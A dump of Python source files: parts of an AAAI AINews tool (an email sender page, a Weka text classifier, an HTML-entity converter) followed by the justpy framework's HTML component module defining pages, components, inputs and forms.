str(email) return email_output def publish_email_semiauto(self): """ Create an AINewsSemiAutoEmail.html file for admin to click and semi-auto send it to the subscriber list. 
""" output = self.generate_email_output() semiauto = """ <html> <head> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> <body> <h1>AI Alert - SemiAuto Sender</h1> <form action="http://aaai.org/cgi-dada/mail.cgi?flavor=send_email" method='post'> <!-- <form action="welcome.php" method="post"> --> <input type='hidden' name='f' value='send_email' /> <input type='hidden' name='process' value='true' /> <input type='hidden' name='admin_list' value='alert' /> <input type='hidden' name='message_subject' value="%s" /> <input type='hidden' name='email_format' value='HTML' /> <textarea type='hidden' name="text_message_body">%s</textarea> <input type='submit' value='Submit Mailing List Message' /> </form> <h2>Please review the email below. If there are concerns, contact Bruce or Reid:</h2> <p> %s </p> </body> <head> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> <META HTTP-EQUIV="Expires" CONTENT="-1"> </head> </html> """ % ("AI Alert - "+str(self.today.strftime("%B %d, %Y")), output, output) savefile(paths['ainews.html'] + "semiauto_email.html", semiauto) ``` #### File: AAAI/AINews/AINewsWekaClassifier.py ```python import re import pickle import arff import csv from nltk.probability import FreqDist from os import listdir, remove from subprocess import * from AINewsCorpus import AINewsCorpus from AINewsConfig import config, paths from AINewsTextProcessor import AINewsTextProcessor class AINewsWekaClassifier: def __init__(self): self.txtpro = AINewsTextProcessor() def __save_bag_of_words(self, tid, fieldidx): # find all unique words in the arff 'title' field, remove stop # words, perform stemming, collect their frequencies phrases = [] f = arff.load(open("%s%d.arff" % (paths['weka.training_arff_dir'], tid), 'r')) for record in f['data']: phrases.append(record[fieldidx]) bag = self.txtpro.simpletextprocess(0, ' '.join(phrases)) smallerbag = FreqDist() i = 0 for word in bag: if i == 1000: break smallerbag[word] = bag[word] i += 1 p = open("%sbag_of_words-%d.pickle" % (paths['weka.bag_of_words_dir'], fieldidx), 'w') pickle.dump(smallerbag, p) p.close() def __prepare_arff(self, tid): p = open("%sbag_of_words-0.pickle" % paths['weka.bag_of_words_dir'], 'r') bag_title = pickle.load(p) p.close() p = open("%sbag_of_words-1.pickle" % paths['weka.bag_of_words_dir'], 'r') bag_body = pickle.load(p) p.close() data = {'attributes': [], 'data': [], 'description': u'', 'relation': tid} for word in bag_title: data['attributes'].append(("title-%s" % word, 'NUMERIC')) for word in bag_body: data['attributes'].append(("body-%s" % word, 'NUMERIC')) data['attributes'].append(('class', ['yes', 'no'])) f = arff.load(open("%s%d.arff" % (paths['weka.training_arff_dir'], tid), 'r')) for record in f['data']: record_bag_title = self.txtpro.simpletextprocess(0, record[0]) record_bag_body = self.txtpro.simpletextprocess(0, record[1]) record_data = [] # iterate through original bag, figure out freq in this record's bag for word in bag_title: if word in record_bag_title: record_data.append(record_bag_title[word]) else: record_data.append(0) for word in bag_body: if word in record_bag_body: record_data.append(record_bag_body[word]) else: record_data.append(0) record_data.append(record[2]) data['data'].append(record_data) fnew = open("%s%d-wordvec-nonsparse.arff" % \ (paths['weka.training_arff_dir'], tid), 'w') arff.dump(fnew, data) fnew.close() # convert to sparse format Popen(("java -cp %s weka.filters.unsupervised.instance.NonSparseToSparse " + "-i %s%d-wordvec-nonsparse.arff -o 
%s%d-wordvec.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() remove("%s%d-wordvec-nonsparse.arff" % (paths['weka.training_arff_dir'], tid)) # 1. load unprocessed arff files, from just one tid, from family_resemblance export # 2. gather all titles, parse into a bag of words # 3. save bag of words (list? need to keep the order) in a pickle file # 4. write new sparse arff files for each tid using this sorted bag of words def __get_tids(self): tids = [] files = listdir(paths['weka.training_arff_dir']) for f in files: m = re.match(r'^(\d+).arff$', f) if m: if m.group(1) == '0': continue tids.append(int(m.group(1))) return tids def train(self): tids = self.__get_tids() # all tid arffs have same entries, so use the first to grab the bag of words print "Saving bag of words..." self.__save_bag_of_words(tids[0], 0) self.__save_bag_of_words(tids[0], 1) for tid in sorted(tids): print "Preparing tid %d" % tid self.__prepare_arff(tid) for tid in sorted(tids): print "Spread subsampling for tid %d" % tid Popen(("java -cp %s weka.filters.supervised.instance.SpreadSubsample " + "-M 1.0 -X 0.0 -S 1 -c last " + "-i %s%d-wordvec.arff -o %s%d-wordvec-subsample.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() print "Training random forests for tid %d" % tid Popen(("java -cp %s %s %s -v " + "-t %s%d-wordvec-subsample.arff -d %s%d.model") % \ (paths['weka.weka_jar'], config['weka.classifier'], config['weka.classifier_params'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() print out def train_experiment(self): model_scores = {} models = {'random-forest': ('weka.classifiers.trees.RandomForest', '-I 20 -K 0'), 'naive-bayes': ('weka.classifiers.bayes.NaiveBayes', ''), 'bayesnet': ('weka.classifiers.bayes.BayesNet', ''), 'j48': ('weka.classifiers.trees.J48', ''), 'knn': ('weka.classifiers.lazy.IBk', '-K 3')} tids = self.__get_tids() # all tid arffs have same entries, so use the first to grab the bag of words print "Saving bag of words..." 
self.__save_bag_of_words(tids[0], 0) self.__save_bag_of_words(tids[0], 1) for tid in sorted(tids): print "Preparing tid %d" % tid self.__prepare_arff(tid) for tid in sorted(tids): print "Spread subsampling for tid %d" % tid Popen(("java -cp %s weka.filters.supervised.instance.SpreadSubsample " + "-M 1.0 -X 0.0 -S 1 -c last " + "-i %s%d-wordvec.arff -o %s%d-wordvec-subsample.arff") % \ (paths['weka.weka_jar'], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True).communicate() for tid in sorted(tids): model_scores[tid] = {} for model in models.keys(): print "Training %s for tid %d" % (models[model][0], tid) (out, _) = Popen(("java -cp %s %s %s -v " + "-t %s%d-wordvec-subsample.arff -d %s%d.model") % \ (paths['weka.weka_jar'], models[model][0], models[model][1], paths['weka.training_arff_dir'], tid, paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() correct = 0.0 for line in out.splitlines(): m = re.search(r'Correctly Classified Instances\s+\d+\s+(.*) %', line) if m: correct = float(m.group(1)) break model_scores[tid][model] = correct with open('training_experiment.csv', 'w') as csvfile: writer = csv.writer(csvfile) writer.writerow(['model', 'tid', 'correct']) for tid in model_scores.keys(): for model in model_scores[tid].keys(): writer.writerow([model, tid, model_scores[tid][model]]) def __predict_arff(self): tids = self.__get_tids() # the testing file should always be 0.arff self.__prepare_arff(0) predictions = {} for tid in sorted(tids): predictions[tid] = [] print "Predicting tid %d" % tid (out, err) = Popen(("java -cp %s %s " + "-T %s0-wordvec.arff -l %s%d.model -p last") % \ (paths['weka.weka_jar'], config['weka.classifier'], paths['weka.training_arff_dir'], paths['weka.training_arff_dir'], tid), shell = True, stdout = PIPE).communicate() for line in out.splitlines(): m = re.search(r'2:no\s+[12]:(no|yes)\s+\+?\s+(\d+\.?\d*)', line) if m: answer = False if m.group(1) == 'yes': answer = True conf = float(m.group(2)) if conf < 0.75: answer = False predictions[tid].append((answer, conf)) return predictions def predict(self, articles): # modifies the provided articles dict data = {'attributes': [('title', 'STRING'), ('body', 'STRING'), ('class', ['yes', 'no'])], 'data': [], 'description': u'', 'relation': '0'} for urlid in sorted(articles.keys()): title = re.sub(r'\W', ' ', articles[urlid]['title']) body = re.sub(r'\W', ' ', articles[urlid]['summary']) data['data'].append([title, body, 'no']) # make the testing file 0.arff fnew = open("%s0.arff" % paths['weka.training_arff_dir'], 'w') arff.dump(fnew, data) fnew.close() predictions = self.__predict_arff() for urlid in sorted(articles.keys()): articles[urlid]['categories'] = [] tids = self.__get_tids() for tid in sorted(tids): for (i, urlid) in enumerate(sorted(articles.keys())): if predictions[tid][i][0]: articles[urlid]['categories'].append(str(tid)) ``` #### File: AAAI/AINews/ents.py ```python import re import htmlentitydefs def convert(s): """Take an input string s, find all things that look like SGML character entities, and replace them with the Unicode equivalent. 
    Function is from:
    http://stackoverflow.com/questions/1197981/convert-html-entities-to-ascii-in-python/1582036#1582036
    """
    matches = re.findall("&#\d+;", s)
    if len(matches) > 0:
        hits = set(matches)
        for hit in hits:
            name = hit[2:-1]
            try:
                entnum = int(name)
                s = s.replace(hit, unichr(entnum))
            except ValueError:
                pass

    matches = re.findall("&\w+;", s)
    hits = set(matches)
    amp = "&"
    if amp in hits:
        hits.remove(amp)
    for hit in hits:
        name = hit[1:-1]
        if name in htmlentitydefs.name2codepoint:
            s = s.replace(hit, unichr(htmlentitydefs.name2codepoint[name]))
    s = s.replace(amp, "&")

    return s
```
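As a quick illustration of `convert` (the module path and input string are made up for the example, and the snippet is Python 2 to match the `unichr`/`htmlentitydefs` usage above):

```python
# -*- coding: utf-8 -*-
from ents import convert  # assumes ents.py is importable from the working directory

s = "AT&amp;T &#38; &copy; 2011"
print convert(s)  # -> AT&T & © 2011  (numeric and named entities decoded to Unicode)
```

Note that because `amp` is set to `"&"` rather than `"&amp;"`, the special-case removal from `hits` never fires: `&amp;` is simply decoded along with the other named entities, and the final `replace` call is a no-op.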
{ "source": "AAAI-DISIM-UnivAQ/justpy", "score": 2 }
#### File: justpy/justpy/htmlcomponents.py ```python from types import MethodType from addict import Dict import json, copy, inspect, sys, re from html.parser import HTMLParser, tagfind_tolerant, attrfind_tolerant from html.entities import name2codepoint from html import unescape from jinja2 import Template import asyncio from .tailwind import Tailwind import logging import httpx # Dictionary for translating from tag to class _tag_class_dict = {} def parse_dict(cls): """ Decorator for component class definitions that updates _tag_class_dict so that the parser can recognize new components Required only for components not defined in this module """ _tag_class_dict[cls.html_tag] = cls return cls class JustPy: loop = None log = None class WebPage: # TODO: Add page events such as online, beforeunload, resize, visibilitychange instances = {} sockets = {} next_page_id = 0 use_websockets = True delete_flag = True tailwind = True debug = False highcharts_theme = None # One of ['avocado', 'dark-blue', 'dark-green', 'dark-unica', 'gray', # 'grid-light', 'grid', 'high-contrast-dark', 'high-contrast-light', 'sand-signika', 'skies', 'sunset'] allowed_events = ['click', 'visibilitychange', 'page_ready', 'result_ready'] def __init__(self, **kwargs): self.page_id = WebPage.next_page_id WebPage.next_page_id += 1 self.cache = None # Set this attribute if you want to use the cache. self.use_cache = False # Determines whether the page uses the cache or not self.template_file = 'tailwind.html' self.title = 'JustPy' self.display_url = None self.redirect = None self.open = None self.favicon = None self.components = [] # list of direct children components on page self.cookies = {} self.css = '' self.head_html = '' self.body_html = '' # If html attribute is not empty, sets html of page directly self.html = '' self.body_style = '' self.body_classes = '' self.reload_interval = None self.events = [] self.dark = False # Set to True for Quasar dark mode (use for other dark modes also) self.data = {} WebPage.instances[self.page_id] = self for k, v in kwargs.items(): self.__setattr__(k, v) def __repr__(self): return f'{self.__class__.__name__}(page_id: {self.page_id}, number of components: {len(self.components)}, reload interval: {self.reload_interval})' def __len__(self): return len(self.components) def add_component(self, child, position=None): if position is None: self.components.append(child) else: self.components.insert(position, child) return self async def on_disconnect(self, websocket=None): if self.delete_flag: self.delete_components() self.remove_page() def remove_page(self): WebPage.instances.pop(self.page_id) def delete_components(self): for c in self.components: c.delete() self.components = [] def add(self, *args): for component in args: self.add_component(component) return self def __add__(self, other): self.add_component(other) return self def __iadd__(self, other): self.add_component(other) return self def remove_component(self, component): try: self.components.remove(component) except: raise Exception('Component cannot be removed because it was not in Webpage') return self def remove(self, component): self.remove_component(component) def get_components(self): return self.components def last(self): return self.components[-1] def set_cookie(self, k, v): self.cookies[str(k)] = str(v) def delete_cookie(self, k): if k in self.cookies: del (self.cookies[str(k)]) async def run_javascript(self, javascript_string, *, request_id=None, send=True): try: websocket_dict = WebPage.sockets[self.page_id] except: return 
self dict_to_send = {'type': 'run_javascript', 'data': javascript_string, 'request_id': request_id, 'send': send} await asyncio.gather(*[websocket.send_json(dict_to_send) for websocket in list(websocket_dict.values())], return_exceptions=True) return self async def reload(self): return await self.run_javascript('location.reload()') async def update_old(self, *, built_list=None): try: websocket_dict = WebPage.sockets[self.page_id] except: return self if not built_list: component_build = self.build_list() else: component_build = built_list for websocket in list(websocket_dict.values()): try: WebPage.loop.create_task(websocket.send_json({'type': 'page_update', 'data': component_build, 'page_options': {'display_url': self.display_url, 'title': self.title, 'redirect': self.redirect, 'open': self.open, 'favicon': self.favicon}})) except: print('Problem with websocket in page update, ignoring') return self async def update(self, websocket=None): try: websocket_dict = WebPage.sockets[self.page_id] except: return self page_build = self.build_list() dict_to_send = {'type': 'page_update', 'data': page_build, 'page_options': {'display_url': self.display_url, 'title': self.title, 'redirect': self.redirect, 'open': self.open, 'favicon': self.favicon}} if websocket: WebPage.loop.create_task(websocket.send_json(dict_to_send)) else: await asyncio.gather(*[websocket.send_json(dict_to_send) for websocket in list(websocket_dict.values())], return_exceptions=True) return self async def delayed_update(self, delay): await asyncio.sleep(delay) return await self.update() def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<div>{ws}' for c in self.components: s = f'{s}{c.to_html(indent + indent_step, indent_step, format)}' s = f'{s}{block_indent}</div>{ws}' return s def react(self): pass def build_list(self): object_list = [] self.react() for i, obj in enumerate(self.components): obj.react(self.data) d = obj.convert_object_to_dict() object_list.append(d) return object_list def on(self, event_type, func): if event_type in self.allowed_events: if inspect.ismethod(func): setattr(self, 'on_' + event_type, func) else: setattr(self, 'on_' + event_type, MethodType(func, self)) if event_type not in self.events: self.events.append(event_type) else: raise Exception(f'No event of type {event_type} supported') async def run_event_function(self, event_type, event_data, create_namespace_flag=True): event_function = getattr(self, 'on_' + event_type) if create_namespace_flag: function_data = Dict(event_data) else: function_data = event_data if inspect.iscoroutinefunction(event_function): event_result = await event_function(function_data) else: event_result = event_function(function_data) return event_result class TailwindUIPage(WebPage): # https://tailwindui.com/components def __init__(self, **kwargs): super().__init__(**kwargs) self.template_file = 'tailwindui.html' class JustpyBaseComponent(Tailwind): next_id = 1 instances = {} temp_flag = True delete_flag = True needs_deletion = False def __init__(self, **kwargs): cls = JustpyBaseComponent temp = kwargs.get('temp', cls.temp_flag) delete_flag = kwargs.get('delete_flag', cls.delete_flag) if temp and delete_flag: self.id = None else: self.id = cls.next_id cls.next_id += 1 self.events = [] self.event_modifiers = Dict() self.transition = None self.allowed_events = [] def initialize(self, **kwargs): for k, v in kwargs.items(): self.__setattr__(k, v) self.set_keyword_events(**kwargs) for com in 
['a', 'add_to']: if com in kwargs.keys(): kwargs[com].add_component(self) def set_keyword_events(self, **kwargs): for e in self.allowed_events: for prefix in ['', 'on', 'on_']: if prefix + e in kwargs.keys(): cls = JustpyBaseComponent if not self.id: self.id = cls.next_id cls.next_id += 1 fn = kwargs[prefix + e] if isinstance(fn, str): fn_string = f'def oneliner{self.id}(self, msg):\n {fn}' exec(fn_string) self.on(e, locals()[f'oneliner{self.id}']) else: self.on(e, fn) break def delete(self): if self.needs_deletion: if self.delete_flag: JustpyBaseComponent.instances.pop(self.id) self.needs_deletion = False def on(self, event_type, func, debounce=None, throttle=None, immediate=False): if event_type in self.allowed_events: cls = JustpyBaseComponent if not self.id: self.id = cls.next_id cls.next_id += 1 cls.instances[self.id] = self self.needs_deletion = True if inspect.ismethod(func): setattr(self, 'on_' + event_type, func) else: setattr(self, 'on_' + event_type, MethodType(func, self)) if event_type not in self.events: self.events.append(event_type) if debounce: self.event_modifiers[event_type].debounce = {'value': debounce, 'timeout': None, 'immediate': immediate} elif throttle: self.event_modifiers[event_type].throttle = {'value': throttle, 'timeout': None} else: raise Exception(f'No event of type {event_type} supported') def remove_event(self, event_type): if event_type in self.events: self.events.remove(event_type) def has_event_function(self, event_type): if getattr(self, 'on_' + event_type, None): return True else: return False def has_class(self, class_name): return class_name in self.classes.split() def remove_class(self, tw_class): class_list = self.classes.split() try: class_list.remove(tw_class) except: pass self.classes = ' '.join(class_list) def hidden(self, flag=True): if flag: self.set_class('hidden') else: self.remove_class('hidden') def hidden_toggle(self): if self.has_class('hidden'): self.remove_class('hidden') else: self.set_class('hidden') async def update(self, socket=None): component_dict = self.convert_object_to_dict() if socket: WebPage.loop.create_task(socket.send_json({'type': 'component_update', 'data': component_dict})) else: pages_to_update = list(self.pages.values()) for page in pages_to_update: try: websocket_dict = WebPage.sockets[page.page_id] except: continue for websocket in list(websocket_dict.values()): try: WebPage.loop.create_task(websocket.send_json({'type': 'component_update', 'data': component_dict})) except: print('Problem with websocket in component update, ignoring') return self def check_transition(self): if self.transition and (not self.id): cls = JustpyBaseComponent self.id = cls.next_id cls.next_id += 1 async def run_method(self, command, websocket): await websocket.send_json({'type': 'run_method', 'data': command, 'id': self.id}) # So the page itself does not update, return True not None return True def remove_page_from_pages(self, wp: WebPage): self.pages.pop(wp.page_id) def add_page(self, wp: WebPage): self.pages[wp.page_id] = wp def add_page_to_pages(self, wp: WebPage): self.pages[wp.page_id] = wp def set_model(self, value): if hasattr(self, 'model'): if len(self.model) == 2: self.model[0].data[self.model[1]] = value else: self.model[0][self.model[1]] = value def get_model(self): if len(self.model) == 2: model_value = self.model[0].data[self.model[1]] else: model_value = self.model[0][self.model[1]] return model_value async def run_event_function(self, event_type, event_data, create_namespace_flag=True): event_function = getattr(self, 
'on_' + event_type) if create_namespace_flag: function_data = Dict(event_data) else: function_data = event_data if inspect.iscoroutinefunction(event_function): event_result = await event_function(function_data) else: event_result = event_function(function_data) return event_result @staticmethod def convert_dict_to_object(d): obj = globals()[d['class_name']]() for obj_prop in d['object_props']: obj.add(JustpyBaseComponent.convert_dict_to_object(obj_prop)) for k, v in d.items(): obj.__dict__[k] = v for k, v in d['attrs'].items(): obj.__dict__[k] = v return obj class HTMLBaseComponent(JustpyBaseComponent): """ Base Component for all HTML components """ attributes = [] html_tag = 'div' vue_type = 'html_component' # Vue.js component name html_global_attributes = ['accesskey', 'class', 'contenteditable', 'dir', 'draggable', 'dropzone', 'hidden', 'id', 'lang', 'spellcheck', 'style', 'tabindex', 'title'] attribute_list = ['id', 'vue_type', 'show', 'events', 'event_modifiers', 'classes', 'style', 'set_focus', 'html_tag', 'class_name', 'event_propagation', 'inner_html', 'animation', 'debug', 'transition'] # not_used_global_attributes = ['dropzone', 'translate', 'autocapitalize', # 'itemid', 'itemprop', 'itemref', 'itemscope', 'itemtype'] # Additions to global attributes to add to attrs dict apart from id and style. used_global_attributes = ['contenteditable', 'dir', 'tabindex', 'title', 'accesskey', 'draggable', 'lang', 'spellcheck'] # https://developer.mozilla.org/en-US/docs/Web/HTML/Element # windows_events = ['afterprint', 'beforeprint', 'beforeunload', 'error', 'hashchange', 'load', # 'message', 'offline', 'online', 'pagehide', 'pageshow', 'popstate', # 'resize', 'storage', 'unload'] # form_events = ['blur', 'change', 'contextmenu', 'focus', 'input', 'invalid', 'reset', 'search', 'select', 'submit'] # keyboard_events = ['keydown', 'keypress', 'keyup'] # mouse_events = ['click', 'dblclick', 'mousedown', 'mousemove', 'mouseout', 'mouseover', 'mouseup', 'wheel', # 'mouseenter', 'mouseleave'] # allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', # 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur'] # allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', # 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur', 'submit', # 'dragstart', 'dragover', 'drop'] def __init__(self, **kwargs): super().__init__(**kwargs) self.class_name = type(self).__name__ self.debug = False self.inner_html = '' self.animation = False self.pages = {} # Dictionary of pages the component is on. Not managed by framework. 
self.show = True self.set_focus = False self.classes = '' self.slot = None self.scoped_slots = {} # For Quasar and other Vue.js based components self.style = '' self.directives = [] self.data = {} self.drag_options = None self.allowed_events = ['click', 'mouseover', 'mouseout', 'mouseenter', 'mouseleave', 'input', 'change', 'after', 'before', 'keydown', 'keyup', 'keypress', 'focus', 'blur', 'submit', 'dragstart', 'dragover', 'drop', 'click__out'] self.events = [] self.event_modifiers = Dict() self.additional_properties = [] # Additional fields to get from the JavasScript event object self.event_propagation = True # If True events are propagated self.prop_list = [] # For components from libraries like quasar self.initialize(**kwargs) def __len__(self): if hasattr(self, 'components'): return len(self.components) else: return 0 def __repr__(self): name = self.name if hasattr(self, 'name') else 'No name' return f'{self.__class__.__name__}(id: {self.id}, html_tag: {self.html_tag}, vue_type: {self.vue_type}, name: {name}, number of components: {len(self)})' def add_to_page(self, wp: WebPage): wp.add_component(self) def add_to(self, *args): for c in args: c.add_component(self) def add_attribute(self, attr, value): self.attrs[attr] = value def add_event(self, event_type): if event_type not in self.allowed_events: self.allowed_events.append(event_type) def add_allowed_event(self, event_type): self.add_event(event_type) def add_scoped_slot(self, slot, c): self.scoped_slots[slot] = c def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<{self.html_tag} ' d = self.convert_object_to_dict() for attr, value in d['attrs'].items(): if value: s = f'{s}{attr}="{value}" ' if self.classes: s = f'{s}class="{self.classes}"/>{ws}' else: s = f'{s}/>{ws}' return s def react(self, data): return def convert_object_to_dict(self): d = {} # Add id if CSS transition is defined if self.transition: self.check_transition() if self.id: d['attrs'] = {'id': str(self.id)} else: d['attrs'] = {} for attr in HTMLBaseComponent.attribute_list: d[attr] = getattr(self, attr) d['directives'] = {} for i in self.directives: if i[0:2] == 'v-': # It is a directive try: d['directives'][i[2:]] = getattr(self, i.replace('-', '_')) except: pass for i in self.prop_list + self.attributes + HTMLBaseComponent.used_global_attributes: try: d['attrs'][i] = getattr(self, i) except: pass if i in ['in', 'from']: # Attributes that are also python reserved words try: d['attrs'][i] = getattr(self, '_' + i) except: pass if '-' in i: s = i.replace('-', '_') # kebab case to snake case try: d['attrs'][i] = getattr(self, s) except: pass # Name is a special case. 
Allow it to be defined for all try: d['attrs']['name'] = self.name except: pass d['scoped_slots'] = {} for s in self.scoped_slots: d['scoped_slots'][s] = self.scoped_slots[s].convert_object_to_dict() if self.additional_properties: d['additional_properties'] = self.additional_properties if self.drag_options: d['drag_options'] = self.drag_options return d class Div(HTMLBaseComponent): # A general purpose container # This is a component that other components can be added to html_tag = 'div' def __init__(self, **kwargs): self.html_entity = False self.children = [] super().__init__(**kwargs) self.components = self.children.copy() def delete(self): if self.delete_flag: for c in self.components: c.delete() if self.needs_deletion: JustpyBaseComponent.instances.pop(self.id) self.components = [] def __getitem__(self, index): return self.components[index] def add_component(self, child, position=None, slot=None): if slot: child.slot = slot if position is None: self.components.append(child) else: self.components.insert(position, child) return self def delete_components(self): for c in self.components: c.delete() self.components = [] def add(self, *args): for component in args: self.add_component(component) return self def __add__(self, child): self.add_component(child) return self def __iadd__(self, child): self.add_component(child) return self def add_first(self, child): self.add_component(child, 0) def remove_component(self, component): try: self.components.remove(component) except: raise Exception('Component cannot be removed because it is not contained in element') return self def remove(self, component): self.remove_component(component) def get_components(self): return self.components def first(self): return self.components[0] def last(self): return self.components[-1] def to_html(self, indent=0, indent_step=0, format=True): block_indent = ' ' * indent if format: ws = '\n' else: ws = '' s = f'{block_indent}<{self.html_tag} ' d = self.convert_object_to_dict() for attr, value in d['attrs'].items(): if value: s = f'{s}{attr}="{value}" ' if self.style: s = f'{s}style="{self.style}"' if self.classes: s = f'{s}class="{self.classes}">{ws}' else: s = f'{s}>{ws}' if self.inner_html: s = f'{s}{self.inner_html}</{self.html_tag}>{ws}' return s try: s = f'{s}{self.text}{ws}' except: pass for c in self.components: s = f'{s}{c.to_html(indent + indent_step, indent_step, format)}' s = f'{s}{block_indent}</{self.html_tag}>{ws}' return s def model_update(self): # [wp, 'text'] for example # self.text = str(self.model[0].data[self.model[1]]) self.text = self.get_model() def build_list(self): object_list = [] for i, obj in enumerate(self.components): obj.react(self.data) d = obj.convert_object_to_dict() object_list.append(d) return object_list def convert_object_to_dict(self): d = super().convert_object_to_dict() if hasattr(self, 'model'): self.model_update() d['object_props'] = self.build_list() if hasattr(self, 'text'): self.text = str(self.text) d['text'] = self.text # Handle HTML entities. Warning: They should be in their own span or div. Setting inner_html overrides all else in container if self.html_entity: d['inner_html'] = self.text return d class Input(Div): # Edge and Internet explorer do not support the input event for checkboxes and radio buttons. 
Use change instead # IMPORTANT: Scope of name of radio buttons is the whole page and not the form unless form is specified html_tag = 'input' attributes = ['accept', 'alt', 'autocomplete', 'autofocus', 'checked', 'dirname', 'disabled', 'form', 'formaction', 'formenctype', 'formmethod', 'formnovalidate', 'formtarget', 'height', 'list', 'max', 'maxlength', 'min', 'minlength', 'multiple', 'name', 'pattern', 'placeholder', 'readonly', 'required', 'size', 'src', 'step', 'type', 'value', 'width'] def __init__(self, **kwargs): self.value = '' self.checked = False self.debounce = 200 # 200 millisecond default debounce for events self.no_events = False # Types for input element: # ['button', 'checkbox', 'color', 'date', 'datetime-local', 'email', 'file', 'hidden', 'image', # 'month', 'number', 'password', 'radio', 'range', 'reset', 'search', 'submit', 'tel', 'text', 'time', 'url', 'week'] self.type = 'text' self.form = None super().__init__(**kwargs) def default_input(self, msg): return self.before_event_handler(msg) if not self.no_events: self.on('before', default_input) def __repr__(self): num_components = len(self.components) return f'{self.__class__.__name__}(id: {self.id}, html_tag: {self.html_tag}, input_type: {self.type}, vue_type: {self.vue_type}, value: {self.value}, checked: {self.checked}, number of components: {num_components})' def before_event_handler(self, msg): JustPy.log.debug('%s %s %s %s %s', 'before ', self.type, msg.event_type, msg.input_type, msg) if msg.event_type not in ['input', 'change', 'select']: return if msg.input_type == 'checkbox': # The checked field is boolean self.checked = msg.checked if hasattr(self, 'model'): self.model[0].data[self.model[1]] = msg.checked elif msg.input_type == 'radio': # If a radio field, all other radio buttons with same name need to have value changed # If form is specified, the scope is that form. 
If not, it is the whole page self.checked = True if self.form: Input.radio_button_set(self, self.form) else: Input.radio_button_set(self, msg.page) if hasattr(self, 'model'): self.model[0].data[self.model[1]] = msg.value self.value = msg.value else: if msg.input_type == 'number': try: msg.value = int(msg.value) except: msg.value = float(msg.value) if hasattr(self, 'model'): # self.model[0].data[self.model[1]] = msg.value self.set_model(msg.value) self.value = msg.value @staticmethod def radio_button_set(radio_button, container): # Set all radio buttons in container with same name as radio_button to unchecked if hasattr(container, 'components'): for c in container.components: if hasattr(c, 'name'): if c.name == radio_button.name and not radio_button.id == c.id: c.checked = False Input.radio_button_set(radio_button, c) @staticmethod def radio_button_set_model_update(radio_button, container, model_value): for c in container.components: if hasattr(c, 'name'): if c.name == radio_button.name: if c.value == model_value: c.checked = True else: c.checked = False Input.radio_button_set_model_update(radio_button, c, model_value) def model_update(self): # update_value = self.model[0].data[self.model[1]] update_value = self.get_model() if self.type == 'checkbox': self.checked = update_value elif self.type == 'radio': model_value = update_value if self.form: Input.radio_button_set_model_update(self, self.form, model_value) else: Input.radio_button_set_model_update(self, self.model[0], model_value) else: self.value = update_value def convert_object_to_dict(self): d = super().convert_object_to_dict() d['debounce'] = self.debounce d['input_type'] = self.type # Needed for vue component updated life hook and event handler if self.type in ['text', 'textarea']: d['value'] = str(self.value) else: d['value'] = self.value d['attrs']['value'] = self.value d['checked'] = self.checked if not self.no_events: if self.type in ['radio', 'checkbox', 'select'] or self.type == 'file': # Not all browsers create input event if 'change' not in self.events: self.events.append('change') else: if 'input' not in self.events: self.events.append('input') if self.checked: d['attrs']['checked'] = True else: d['attrs']['checked'] = False try: d['attrs']['form'] = self.form.id except: pass return d class InputChangeOnly(Input): """ Does not generate the 'input' event. Generates the 'change' event. Leaves other events unchanged. Use if you don't need to look at each character typed. Saves interaction with the server The 'change' event docs: https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/change_event Salient: When the element loses focus after its value was changed, but not committed (e.g., after editing the value of <textarea> or <input type="text">) or when Enter is pressed. 
""" def convert_object_to_dict(self): d = super().convert_object_to_dict() d['events'].remove('input') if 'change' not in d['events']: d['events'].append('change') return d class Form(Div): html_tag = 'form' attributes = ['accept-charset', 'action', 'autocomplete', 'enctype', 'method', 'name', 'novalidate', 'target'] def __init__(self, **kwargs): super().__init__(**kwargs) def default_submit(self, msg): print('Default form submit', msg.form_data) return True if not self.has_event_function('submit'): # If an event handler is not assigned, the front end cannot stop the default page request that happens when a form is submitted self.on('submit', default_submit) class Label(Div): html_tag = 'label' attributes = ['for', 'form'] # In JustPy these are components, not ids of component like in HTML def __init__(self, **kwargs): self.for_component = None super().__init__(**kwargs) def convert_object_to_dict(self): d = super().convert_object_to_dict() try: d['attrs']['for'] = self.for_component.id except: pass try: d['attrs']['form'] = self.form.id except: pass return d class Textarea(Input): html_tag = 'textarea' attributes = ['autofocus', 'cols', 'dirname', 'disabled', 'form', 'maxlength', 'name', 'placeholder', 'readonly', 'required', 'rows', 'wrap', 'value'] def __init__(self, **kwargs): self.rows = '4' self.cols = '50' super().__init__(**kwargs) self.type = 'textarea' self.input_type = 'text' class Select(Input): # Need to set value of select on creation, otherwise blank line will show on page update html_tag = 'select' attributes = ['autofocus', 'disabled', 'form', 'multiple', 'name', 'required', 'size'] def __init__(self, **kwargs): super().__init__(**kwargs) self.type = 'select' class A(Div): html_tag = 'a' attributes = ['download', 'href', 'hreflang', 'media', 'ping', 'rel', 'target', 'type'] def __init__(self, **kwargs): self.href = None self.bookmark = None # The component on page to jump to or scroll to self.title = '' self.rel = "noopener noreferrer" self.download = None # If attribute is set, file is downloaded, only works html 5 https://www.w3schools.com/tags/att_a_download.asp self.target = '_self' # _blank, _self, _parent, _top, framename # https://developer.mozilla.org/en-US/docs/Web/API/Element/scrollIntoView self.scroll = False # If True, scrolling is enabled self.scroll_option = 'smooth' # One of "auto" or "smooth". self.block_option = 'start' # One of "start", "center", "end", or "nearest". 